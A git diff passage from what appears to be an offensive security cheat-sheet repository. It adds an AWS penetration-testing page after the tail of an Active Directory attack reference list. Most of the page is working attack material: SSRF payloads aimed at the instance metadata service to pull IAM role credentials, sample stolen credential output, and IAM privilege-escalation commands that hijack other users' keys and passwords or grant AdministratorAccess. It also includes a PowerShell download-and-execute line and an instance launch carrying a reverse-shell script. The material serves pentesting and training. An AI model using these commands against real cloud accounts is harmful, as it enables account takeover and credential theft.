Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond) +* [A Diamond (Ticket) in the Ruff - By CHARLIE CLARK July 05, 2022](https://www.semperis.com/blog/a-diamond-ticket-in-the-ruff/) +* [Sapphire tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/sapphire) +* [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html) +* [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/) +* [.NET Advanced Code Auditing XmlSerializer Deserialization Vulnerability - April 2, 2019 by znlive](https://znlive.com/xmlserializer-deserialization-vulnerability) +* [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/) +* [Relaying to AD Certificate Services over RPC - NOVEMBER 16, 2022 - SYLVAIN HEINIGER](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/) +* [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf) +* [Hunt for the gMSA secrets - Dr Nestori Syynimaa (@DrAzureAD) - August 29, 2022](https://aadinternals.com/post/gmsa/) +* [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867) +* [Poc’ing Beyond Domain Admin - Part 1 - cube0x0](https://cube0x0.github.io/Pocing-Beyond-DA/) +* [At the Edge of Tier Zero: The Curious Case of the RODC - Elad Shamir](https://posts.specterops.io/at-the-edge-of-tier-zero-the-curious-case-of-the-rodc-ef5f1799ca06) +* [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592) +* [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/) +* [Timeroasting: Attacking Trust Accounts in Active Directory - Tom Tervoort - 01 March 2023](https://www.secura.com/blog/timeroasting-attacking-trust-accounts-in-active-directory) +* [TIMEROASTING, TRUSTROASTING AND COMPUTER SPRAYING WHITE PAPER - Tom Tervoort](https://www.secura.com/uploads/whitepapers/Secura-WP-Timeroasting-v3.pdf) +* [Beyond LLMNR/NBNS Spoofing – Exploiting Active Directory-Integrated DNS - July 10, 2018 | Kevin Robertson](https://www.netspi.com/blog/technical/network-penetration-testing/exploiting-adidns/) +* [ADIDNS Revisited – WPAD, GQBL, and More - December 5, 2018 | Kevin Robertson](https://www.netspi.com/blog/technical/network-penetration-testing/adidns-revisited/) +* [Getting in the Zone: dumping Active Directory DNS using adidnsdump - Dirk-jan Mollema](https://blog.fox-it.com/2019/04/25/getting-in-the-zone-dumping-active-directory-dns-using-adidnsdump/) +* [S4U2self abuse - TheHackerRecipes](https://www.thehacker.recipes/ad/movement/kerberos/delegations/s4u2self-abuse) +* [Abusing Kerberos S4U2self for local privilege escalation - cfalta](https://cyberstoph.org/posts/2021/06/abusing-kerberos-s4u2self-for-local-privilege-escalation/) +* [External Trusts Are Evil - 14 March 2023 - Charlie Clark (@exploitph)](https://exploit.ph/external-trusts-are-evil.html) +* [Certificates and Pwnage and Patches, Oh My! - Will Schroeder - Nov 9, 2022](https://posts.specterops.io/certificates-and-pwnage-and-patches-oh-my-8ae0f4304c1d) diff --git a/docs/cloud/C.md b/docs/cloud/C.md deleted file mode 100644 index 40d9ab9..0000000 --- a/docs/cloud/C.md +++ /dev/null @@ -1 +0,0 @@ -TEST C \ No newline at end of file diff --git a/docs/cloud/aws/Cloud - AWS Pentest.md b/docs/cloud/aws/Cloud - AWS Pentest.md new file mode 100644 index 0000000..53a9499 --- /dev/null +++ b/docs/cloud/aws/Cloud - AWS Pentest.md @@ -0,0 +1,2410 @@ +# Cloud - AWS + +> Amazon Web Services offers reliable, scalable, and inexpensive cloud computing services. + +## Summary + +- [AWS](#aws) + - [Summary](#summary) + - [Training](#training) + - [Tools](#tools) + - [AWS - Patterns](#aws---patterns) + - [URL Services](#url-services) + - [Access Key ID & Secret](#access-key-id--secret) + - [AWS - Metadata SSRF](#aws---metadata-ssrf) + - [Method for Elastic Cloud Compute (EC2)](#method-for-elastic-cloud-compute-ec2) + - [Method for Container Service (Fargate)](#method-for-container-service-fargate) + - [AWS API calls that return credentials](#aws-api-calls-that-return-credentials) + - [AWS - Shadow Admin](#aws---shadow-admin) + - [Admin equivalent permission](#admin-equivalent-permission) + - [AWS - Gaining AWS Console Access via API Keys](#aws---gaining-aws-console-access-via-api-keys) + - [AWS - Enumerate IAM permissions](#aws---enumerate-iam-permissions) + - [AWS - Mount EBS volume to EC2 Linux](#aws---mount-ebs-volume-to-ec2-linux) + - [AWS - Copy EC2 using AMI Image](#aws---copy-ec2-using-ami-image) + - [AWS - Instance Connect - Push an SSH key to EC2 instance](#aws---instance-connect---push-an-ssh-key-to-ec2-instance) + - [AWS - Lambda - Extract function's code](#aws---lambda---extract-functions-code) + - [AWS - SSM - Command execution](#aws---ssm---command-execution) + - [AWS - Golden SAML Attack](#aws---golden-saml-attack) + - [AWS - Shadow Copy attack](#aws---shadow-copy-attack) + - [Disable CloudTrail](#disable-cloudtrail) + - [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty) + - [DynamoDB](#dynamodb) + - [Security checks](#security-checks) + - [AWSome Pentesting Cheatsheet](#awsome-pentesting-cheatsheet) + - [References](#references) + +## Training + +* CloudFoxable: A Gamified Cloud Hacking Sandbox - https://cloudfoxable.bishopfox.com/ +* AWSGoat : A Damn Vulnerable AWS Infrastructure - https://github.com/ine-labs/AWSGoat +* Damn Vulnerable Cloud Application - https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6 +* SadCloud - https://github.com/nccgroup/sadcloud +* Flaws - http://flaws.cloud +* Cloudgoat - https://github.com/RhinoSecurityLabs/cloudgoat + +## Tools + +* [CloudFox](https://github.com/BishopFox/CloudFox/) - Automating situational awareness for cloud penetration tests. Designed for white box enumeration (SecurityAudit/ReadOnly type permission), but can be used for black box (found credentials) as well. + * Either Download the [latest binary release](https://github.com/BishopFox/cloudfox/releases) for your platform, or build it from source. + ``` + git clone https://github.com/BishopFox/cloudfox.git + cd ./cloudfox + go build . + ``` + + * Run all AWS checks: `cloudfox aws --profile [profile-name] all-checks` + * List all AWS checks: `cloudfox aws` + +* [SkyArk](https://github.com/cyberark/SkyArk) - Discover the most privileged users in the scanned AWS environment, including the AWS Shadow Admins + * Requires read-Only permissions over IAM service + ```powershell + $ git clone https://github.com/cyberark/SkyArk + $ powershell -ExecutionPolicy Bypass -NoProfile + PS C> Import-Module .\SkyArk.ps1 -force + PS C> Start-AWStealth + + or in the Cloud Console + + PS C> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/SkyArk/master/AWStealth/AWStealth.ps1') + PS C> Scan-AWShadowAdmins + ``` + +* [Pacu](https://github.com/RhinoSecurityLabs/pacu) - Exploit configuration flaws within an AWS environment using an extensible collection of modules with a diverse feature-set + * Requires AWS Keys + ```powershell + $ git clone https://github.com/RhinoSecurityLabs/pacu + $ bash install.sh + $ python3 pacu.py + set_keys/swap_keys + ls + run [--keyword-arguments] + run --regions eu-west-1,us-west-1 + + # https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details + ``` + +* [Bucket Finder](https://digi.ninja/projects/bucket_finder.php) - Search for public buckets, list and download all files if directory indexing is enabled + ```powershell + wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2 + ./bucket_finder.rb my_words + ./bucket_finder.rb --region ie my_words + US Standard = http://s3.amazonaws.com + Ireland = http://s3-eu-west-1.amazonaws.com + Northern California = http://s3-us-west-1.amazonaws.com + Singapore = http://s3-ap-southeast-1.amazonaws.com + Tokyo = http://s3-ap-northeast-1.amazonaws.com + + ./bucket_finder.rb --download --region ie my_words + ./bucket_finder.rb --log-file bucket.out my_words + ``` + +* [Boto3](https://boto3.amazonaws.com/v1/documentation/api/latest/index.html) - Amazon Web Services (AWS) SDK for Python + ```python + import boto3 + # Create an S3 client + s3 = boto3.client('s3',aws_access_key_id='AKIAJQDP3RKREDACTED',aws_secret_access_key='igH8yFmmpMbnkcUaCqXJIRIozKVaREDACTED',region_name='us-west-1') + + try: + result = s3.list_buckets() + print(result) + except Exception as e: + print(e) + ``` + +* [Prowler](https://github.com/toniblyx/prowler) - AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness + + > It follows guidelines of the CIS Amazon Web Services Foundations Benchmark and DOZENS of additional checks including GDPR and HIPAA (+100). + * Require: arn:aws:iam::aws:policy/SecurityAudit + + ```powershell + $ pip install awscli ansi2html detect-secrets + $ git clone https://github.com/toniblyx/prowler + $ sudo apt install jq + $ ./prowler -E check42,check43 + $ ./prowler -p custom-profile -r us-east-1 -c check11 + $ ./prowler -A 123456789012 -R ProwlerRole # sts assume-role + ``` + +* [Principal Mapper](https://github.com/nccgroup/PMapper) - A tool for quickly evaluating IAM permissions in AWS + ```powershell + https://github.com/nccgroup/PMapper + pip install principalmapper + pmapper graph --create + pmapper visualize --filetype png + pmapper analysis --output-type text + + # Determine if PowerUser can escalate privileges + pmapper query "preset privesc user/PowerUser" + pmapper argquery --principal user/PowerUser --preset privesc + + # Find all principals that can escalate privileges + pmapper query "preset privesc *" + pmapper argquery --principal '*' --preset privesc + + # Find all principals that PowerUser can access + pmapper query "preset connected user/PowerUser *" + pmapper argquery --principal user/PowerUser --resource '*' --preset connected + + # Find all principals that can access PowerUser + pmapper query "preset connected * user/PowerUser" + pmapper argquery --principal '*' --resource user/PowerUser --preset connected + ``` + +* [ScoutSuite](https://github.com/nccgroup/ScoutSuite/wiki) - Multi-Cloud Security Auditing Tool + ```powershell + $ git clone https://github.com/nccgroup/ScoutSuite + $ python scout.py PROVIDER --help + # The --session-token is optional and only used for temporary credentials (i.e. role assumption). + $ python scout.py aws --access-keys --access-key-id --secret-access-key --session-token + $ python scout.py azure --cli + ``` + +* [s3_objects_check](https://github.com/nccgroup/s3_objects_check) - Whitebox evaluation of effective S3 object permissions, to identify publicly accessible files + ```powershell + $ git clone https://github.com/nccgroup/s3_objects_check + $ python3 -m venv env && source env/bin/activate + $ pip install -r requirements.txt + $ python s3-objects-check.py -h + $ python s3-objects-check.py -p whitebox-profile -e blackbox-profile + ``` + +* [cloudsplaining](https://github.com/salesforce/cloudsplaining) - An AWS IAM Security Assessment tool that identifies violations of least privilege and generates a risk-prioritized report + ```powershell + $ pip3 install --user cloudsplaining + $ cloudsplaining download --profile myawsprofile + $ cloudsplaining scan --input-file default.json + ``` + +* [weirdAAL](https://github.com/carnal0wnage/weirdAAL/wiki) - AWS Attack Library + ```powershell + python3 weirdAAL.py -m ec2_describe_instances -t demo + python3 weirdAAL.py -m lambda_get_account_settings -t demo + python3 weirdAAL.py -m lambda_get_function -a 'MY_LAMBDA_FUNCTION','us-west-2' -t yolo + ``` + +* [cloudmapper](https://github.com/duo-labs/cloudmapper.git) - CloudMapper helps you analyze your Amazon Web Services (AWS) environments + ```powershell + git clone https://github.com/duo-labs/cloudmapper.git + # sudo yum install autoconf automake libtool python3-devel.x86_64 python3-tkinter python-pip jq awscli + # You may additionally need "build-essential" + sudo apt-get install autoconf automake libtool python3.7-dev python3-tk jq awscli + pipenv install --skip-lock + pipenv shell + report: Generate HTML report. Includes summary of the accounts and audit findings. + iam_report: Generate HTML report for the IAM information of an account. + audit: Check for potential misconfigurations. + collect: Collect metadata about an account. + find_admins: Look at IAM policies to identify admin users and roles, or principals with specific privileges + ``` + +* [Cognito Scanner](https://github.com/padok-team/cognito-scanner) - A CLI tool for executing attacks on cognito such as *Unwanted account creation*, *Account Oracle* and *Identity Pool escalation*. + ```bash + # Installation + $ pip install cognito-scanner + # Usage + $ cognito-scanner --help + # Get information about how to use the unwanted account creation script + $ cogntio-scanner account-creation --help + # For more details go to https://github.com/padok-team/cognito-scanner + ``` + +* [dufflebag](https://labs.bishopfox.com/dufflebag) - Find secrets that are accidentally exposed via Amazon EBS's "public" mode +* [NetSPI/AWS Consoler](https://github.com/NetSPI/aws_consoler) - Convert AWS Credentials into a console access + + + +## AWS - Patterns + +### URL Services + +| Service | URL | +|--------------|-----------------------| +| s3 | https://{user_provided}.s3.amazonaws.com | +| cloudfront | https://{random_id}.cloudfront.net | +| ec2 | ec2-{ip-seperated}.compute-1.amazonaws.com | +| es | https://{user_provided}-{random_id}.{region}.es.amazonaws.com | +| elb | http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443 | +| elbv2 | https://{user_provided}-{random_id}.{region}.elb.amazonaws.com | +| rds | mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306 | +| rds | postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432 | +| route 53 | {user_provided} | +| execute-api | https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided} | +| cloudsearch | https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com | +| transfer | sftp://s-{random_id}.server.transfer.{region}.amazonaws.com | +| iot | mqtt://{random_id}.iot.{region}.amazonaws.com:8883 | +| iot | https://{random_id}.iot.{region}.amazonaws.com:8443 | +| iot | https://{random_id}.iot.{region}.amazonaws.com:443 | +| mq | https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162 | +| mq | ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617 | +| kafka | b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com | +| kafka | {user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com | +| cloud9 | https://{random_id}.vfs.cloud9.{region}.amazonaws.com | +| mediastore | https://{random_id}.data.mediastore.{region}.amazonaws.com | +| kinesisvideo | https://{random_id}.kinesisvideo.{region}.amazonaws.com | +| mediaconvert | https://{random_id}.mediaconvert.{region}.amazonaws.com | +| mediapackage | https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel | + + +### Access Key ID & Secret + +IAM uses the following prefixes to indicate what type of resource each unique ID applies to. The first four characters are the prefix that depends on the type of the key. + +| Prefix | Resource type | +|--------------|-------------------------| +| ABIA | AWS STS service bearer token | +| ACCA | Context-specific credential | +| AGPA | User group | +| AIDA | IAM user | +| AIPA | Amazon EC2 instance profile | +| AKIA | Access key | +| ANPA | Managed policy | +| ANVA | Version in a managed policy | +| APKA | Public key | +| AROA | Role | +| ASCA | Certificate | +| ASIA | Temporary (AWS STS) access key | + +The rest of the string is Base32 encoded and can be used to recover the account id. + +```py +import base64 +import binascii + +def AWSAccount_from_AWSKeyID(AWSKeyID): + + trimmed_AWSKeyID = AWSKeyID[4:] #remove KeyID prefix + x = base64.b32decode(trimmed_AWSKeyID) #base32 decode + y = x[0:6] + + z = int.from_bytes(y, byteorder='big', signed=False) + mask = int.from_bytes(binascii.unhexlify(b'7fffffffff80'), byteorder='big', signed=False) + + e = (z & mask)>>7 + return (e) + + +print ("account id:" + "{:012d}".format(AWSAccount_from_AWSKeyID("ASIAQNZGKIQY56JQ7WML"))) +``` + + +## AWS - Metadata SSRF + +> AWS released additional security defences against the attack. + +:warning: Only working with IMDSv1. +Enabling IMDSv2 : `aws ec2 modify-instance-metadata-options --instance-id --profile --http-endpoint enabled --http-token required`. + +In order to use IMDSv2 you must provide a token. + +```powershell +export TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"` +curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta-data" +``` + +### Method for Elastic Cloud Compute (EC2) + +Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/ + +1. Access the IAM : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/ + ```powershell + ami-id + ami-launch-index + ami-manifest-path + block-device-mapping/ + events/ + hostname + iam/ + identity-credentials/ + instance-action + instance-id + ``` +2. Find the name of the role assigned to the instance : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/ +3. Extract the role's temporary keys : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/ + ```powershell + { + "Code" : "Success", + "LastUpdated" : "2019-07-31T23:08:10Z", + "Type" : "AWS-HMAC", + "AccessKeyId" : "ASIA54BL6PJR37YOEP67", + "SecretAccessKey" : "OiAjgcjm1oi2xxxxxxxxOEXkhOMhCOtJMP2", + "Token" : "AgoJb3JpZ2luX2VjEDU86Rcfd/34E4rtgk8iKuTqwrRfOppiMnv", + "Expiration" : "2019-08-01T05:20:30Z" + } + ``` + +### Method for Container Service (Fargate) + +1. Fetch the AWS_CONTAINER_CREDENTIALS_RELATIVE_URI variable from https://awesomeapp.com/download?file=/proc/self/environ + ```powershell + JAVA_ALPINE_VERSION=8.212.04-r0 + HOSTNAME=bbb3c57a0ed3SHLVL=1PORT=8443HOME=/root + AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/d22070e0-5f22-4987-ae90-1cd9bec3f447 + AWS_EXECUTION_ENV=AWS_ECS_FARGATEMVN_VER=3.3.9JAVA_VERSION=8u212AWS_DEFAULT_REGION=us-west-2 + ECS_CONTAINER_METADATA_URI=http://169.254.170.2/v3/cb4f6285-48f2-4a51-a787-67dbe61c13ffPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/bin:/usr/lib/mvn:/usr/lib/mvn/binLANG=C.UTF-8AWS_REGION=us-west-2Tag=48111bbJAVA_HOME=/usr/lib/jvm/java-1.8-openjdk/jreM2=/usr/lib/mvn/binPWD=/appM2_HOME=/usr/lib/mvnLD_LIBRARY_PATH=/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64/server:/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64:/usr/lib/jvm/java-1.8-openjd + ``` +2. Use the credential URL to dump the AccessKey and SecretKey : https://awesomeapp.com/forward?target=http://169.254.170.2/v2/credentials/d22070e0-5f22-4987-ae90-1cd9bec3f447 + ```powershell + { + "RoleArn": "arn:aws:iam::953574914659:role/awesome-waf-role", + "AccessKeyId": "ASIA54BL6PJR2L75XHVS", + "SecretAccessKey": "j72eTy+WHgIbO6zpe2DnfjEhbObuTBKcemfrIygt", + "Token": "FQoGZXIvYXdzEMj//////////wEaDEQW+wwBtaoyqH5lNSLGBF3PnwnLYa3ggfKBtLMoWCEyYklw6YX85koqNwKMYrP6ymcjv4X2gF5enPi9/Dx6m/1TTFIwMzZ3tf4V3rWP3HDt1ea6oygzTrWLvfdp57sKj+2ccXI+WWPDZh3eJr4Wt4JkiiXrWANn7Bx3BUj9ZM11RXrKRCvhrxdrMLoewRkWmErNEOFgbaCaT8WeOkzqli4f+Q36ZerT2V+FJ4SWDX1CBsimnDAMAdTIRSLFxVBBwW8171OHiBOYAMK2np1xAW1d3UCcZcGKKZTjBee2zs5+Rf5Nfkoq+j7GQkmD2PwCeAf0RFETB5EVePNtlBWpzfOOVBtsTUTFewFfx5cyNsitD3C2N93WR59LX/rNxyncHGDUP/6UPlasOcfzAaG738OJQmWfQTR0qksHIc2qiPtkstnNndh76is+r+Jc4q3wOWu2U2UBi44Hj+OS2UTpMAwc/MshIiGsUOrBQdPqcLLdAxKpUNTdSQNLg5wv4f2OrOI8/sneV58yBRolBz8DZoH8wohtLXpueDt8jsVSVLznnMOOe/4ehHE2Nt+Fy+tjaY5FUi/Ijdd5IrIdIvWFHY1XcPopUFYrDqr0yuZvX1YddfIcfdbmxf274v69FuuywXTo7cXk1QTMYZWlD/dPI/k6KQeO446UrHT9BJxcJMpchAIVRpI7nVKkSDwku1joKUG7DOeycuAbhecVZG825TocL0ks2yXPnIdvckAaU9DZf+afIV3Nxv3TI4sSX1npBhb2f/8C31pv8VHyu2NiN5V6OOHzZijHsYXsBQ==", + "Expiration": "2019-09-18T04:05:59Z" + } + ``` + + +### AWS API calls that return credentials + +- chime:createapikey +- [codepipeline:pollforjobs](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html) +- [cognito-identity:getopenidtoken](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdToken.html) +- [cognito-identity:getopenidtokenfordeveloperidentity](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdTokenForDeveloperIdentity.html) +- [cognito-identity:getcredentialsforidentity](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetCredentialsForIdentity.html) +- [connect:getfederationtoken](https://docs.aws.amazon.com/connect/latest/APIReference/API_GetFederationToken.html) +- [connect:getfederationtokens](https://docs.aws.amazon.com/connect/latest/APIReference/API_GetFederationToken.html) +- [ecr:getauthorizationtoken](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/API_GetAuthorizationToken.html) +- [gamelift:requestuploadcredentials](https://docs.aws.amazon.com/gamelift/latest/apireference/API_RequestUploadCredentials.html) +- [iam:createaccesskey](https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateAccessKey.html) +- [iam:createloginprofile](https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateLoginProfile.html) +- [iam:createservicespecificcredential](https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateServiceSpecificCredential.html) +- [iam:resetservicespecificcredential](https://docs.aws.amazon.com/IAM/latest/APIReference/API_ResetServiceSpecificCredential.html) +- [iam:updateaccesskey](https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateAccessKey.html) +- [lightsail:getinstanceaccessdetails](https://docs.aws.amazon.com/lightsail/2016-11-28/api-reference/API_GetInstanceAccessDetails.html) +- [lightsail:getrelationaldatabasemasteruserpassword](https://docs.aws.amazon.com/lightsail/2016-11-28/api-reference/API_GetRelationalDatabaseMasterUserPassword.html) +- [rds-db:connect](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.IAMPolicy.html) +- [redshift:getclustercredentials](https://docs.aws.amazon.com/redshift/latest/APIReference/API_GetClusterCredentials.html) +- [sso:getrolecredentials](https://docs.aws.amazon.com/singlesignon/latest/PortalAPIReference/API_GetRoleCredentials.html) +- [mediapackage:rotatechannelcredentials](https://docs.aws.amazon.com/mediapackage/latest/apireference/channels-id-credentials.html) +- [mediapackage:rotateingestendpointcredentials](https://docs.aws.amazon.com/mediapackage/latest/apireference/channels-id-ingest_endpoints-ingest_endpoint_id-credentials.html) +- [sts:assumerole](https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role.html) +- [sts:assumerolewithsaml](https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role-with-saml.html) +- [sts:assumerolewithwebidentity](https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role-with-web-identity.html) +- [sts:getfederationtoken](https://docs.aws.amazon.com/cli/latest/reference/sts/get-federation-token.html) +- [sts:getsessiontoken](https://docs.aws.amazon.com/cli/latest/reference/sts/get-session-token.html) + + +## AWS - Shadow Admin + +### Admin equivalent permission + +- AdministratorAccess + + ```powershell + "Action": "*" + "Resource": "*" + ``` + +- **ec2:AssociateIamInstanceProfile** : attach an IAM instance profile to an EC2 instance + ```powershell + aws ec2 associate-iam-instance-profile --iam-instance-profile Name=admin-role --instance-id i-0123456789 + ``` + +- **iam:CreateAccessKey** : create a new access key to another IAM admin account + ```powershell + aws iam create-access-key –user-name target_user + ``` + +- **iam:CreateLoginProfile** : add a new password-based login profile, set a new password for an entity and impersonate it + ```powershell + $ aws iam create-login-profile –user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' –no-password-reset-required + ``` + +- **iam:UpdateLoginProfile** : reset other IAM users’ login passwords. + ```powershell + $ aws iam update-login-profile –user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' –no-password-reset-required + ``` + +- **iam:AttachUserPolicy**, **iam:AttachGroupPolicy** or **iam:AttachRolePolicy** : attach existing admin policy to any other entity he currently possesses + ```powershell + $ aws iam attach-user-policy –user-name my_username –policy-arn arn:aws:iam::aws:policy/AdministratorAccess + $ aws iam attach-user-policy –user-name my_username –policy-arn arn:aws:iam::aws:policy/AdministratorAccess + $ aws iam attach-role-policy –role-name role_i_can_assume –policy-arn arn:aws:iam::aws:policy/AdministratorAccess + ``` + +- **iam:PutUserPolicy**, **iam:PutGroupPolicy** or **iam:PutRolePolicy** : added inline policy will allow the attacker to grant additional privileges to previously compromised entities. + ```powershell + $ aws iam put-user-policy –user-name my_username –policy-name my_inline_policy –policy-document file://path/to/administrator/policy.json + ``` + +- **iam:CreatePolicy** : add a stealthy admin policy +- **iam:AddUserToGroup** : add into the admin group of the organization. + ```powershell + $ aws iam add-user-to-group –group-name target_group –user-name my_username + ``` + +- **iam:UpdateAssumeRolePolicy** + **sts:AssumeRole** : change the assuming permissions of a privileged role and then assume it with a non-privileged account. + ```powershell + $ aws iam update-assume-role-policy –role-name role_i_can_assume –policy-document file://path/to/assume/role/policy.json + ``` + +- **iam:CreatePolicyVersion** & **iam:SetDefaultPolicyVersion** : change customer-managed policies and change a non-privileged entity to be a privileged one. + ```powershell + $ aws iam create-policy-version –policy-arn target_policy_arn –policy-document file://path/to/administrator/policy.json –set-as-default + $ aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2 + ``` + +- **lambda:UpdateFunctionCode** : give an attacker access to the privileges associated with the Lambda service role that is attached to that function. + ```powershell + $ aws lambda update-function-code –function-name target_function –zip-file fileb://my/lambda/code/zipped.zip + ``` + +- **glue:UpdateDevEndpoint** : give an attacker access to the privileges associated with the role attached to the specific Glue development endpoint. + ```powershell + $ aws glue –endpoint-name target_endpoint –public-key file://path/to/my/public/ssh/key.pub + ``` + + +- **iam:PassRole** + **ec2:CreateInstanceProfile**/**ec2:AddRoleToInstanceProfile** : an attacker could create a new privileged instance profile and attach it to a compromised EC2 instance that he possesses. + +- **iam:PassRole** + **ec2:RunInstance** : give an attacker access to the set of permissions that the instance profile/role has, which again could range from no privilege escalation to full administrator access of the AWS account. + ```powershell + # add ssh key + $ aws ec2 run-instances –image-id ami-a4dc46db –instance-type t2.micro –iam-instance-profile Name=iam-full-access-ip –key-name my_ssh_key –security-group-ids sg-123456 + # execute a reverse shell + $ aws ec2 run-instances –image-id ami-a4dc46db –instance-type t2.micro –iam-instance-profile Name=iam-full-access-ip –user-data file://script/with/reverse/shell.sh + ``` + +- **iam:PassRole** + **lambda:CreateFunction** + **lambda:InvokeFunction** : give a user access to the privileges associated with any Lambda service role that exists in the account. + ```powershell + $ aws lambda create-function –function-name my_function –runtime python3.6 –role arn_of_lambda_role –handler lambda_function.lambda_handler –code file://my/python/code.py + $ aws lambda invoke –function-name my_function output.txt + ``` + Example of code.py + ```python + import boto3 + def lambda_handler(event, context): + client = boto3.client('iam') + response = client.attach_user_policy( + UserName='my_username', + PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess" + ) + return response + ``` + +* **iam:PassRole** + **glue:CreateDevEndpoint** : access to the privileges associated with any Glue service role that exists in the account. + ```powershell + $ aws glue create-dev-endpoint –endpoint-name my_dev_endpoint –role-arn arn_of_glue_service_role –public-key file://path/to/my/public/ssh/key.pub + ``` + +## AWS - Gaining AWS Console Access via API Keys + +A utility to convert your AWS CLI credentials into AWS console access. + +```powershell +$> git clone https://github.com/NetSPI/aws_consoler +$> aws_consoler -v -a AKIA[REDACTED] -s [REDACTED] +2020-03-13 19:44:57,800 [aws_consoler.cli] INFO: Validating arguments... +2020-03-13 19:44:57,801 [aws_consoler.cli] INFO: Calling logic. +2020-03-13 19:44:57,820 [aws_consoler.logic] INFO: Boto3 session established. +2020-03-13 19:44:58,193 [aws_consoler.logic] WARNING: Creds still permanent, creating federated session. +2020-03-13 19:44:58,698 [aws_consoler.logic] INFO: New federated session established. +2020-03-13 19:44:59,153 [aws_consoler.logic] INFO: Session valid, attempting to federate as arn:aws:sts::123456789012:federated-user/aws_consoler. +2020-03-13 19:44:59,668 [aws_consoler.logic] INFO: URL generated! +https://signin.aws.amazon.com/federation?Action=login&Issuer=consoler.local&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2Fconsole%2Fhome%3Fregion%3Dus-east-1&SigninToken=[REDACTED +``` + +## AWS - Enumerate IAM permissions + +Enumerate the permissions associated with AWS credential set with [enumerate-iam](https://github.com/andresriancho/enumerate-iam) + +```powershell +git clone git@github.com:andresriancho/enumerate-iam.git +pip install -r requirements.txt +./enumerate-iam.py --access-key AKIA... --secret-key StF0q... +2019-05-10 15:57:58,447 - 21345 - [INFO] Starting permission enumeration for access-key-id "AKIA..." +2019-05-10 15:58:01,532 - 21345 - [INFO] Run for the hills, get_account_authorization_details worked! +2019-05-10 15:58:01,537 - 21345 - [INFO] -- { + "RoleDetailList": [ + { + "Tags": [], + "AssumeRolePolicyDocument": { + "Version": "2008-10-17", + "Statement": [ + { +... +2019-05-10 15:58:26,709 - 21345 - [INFO] -- 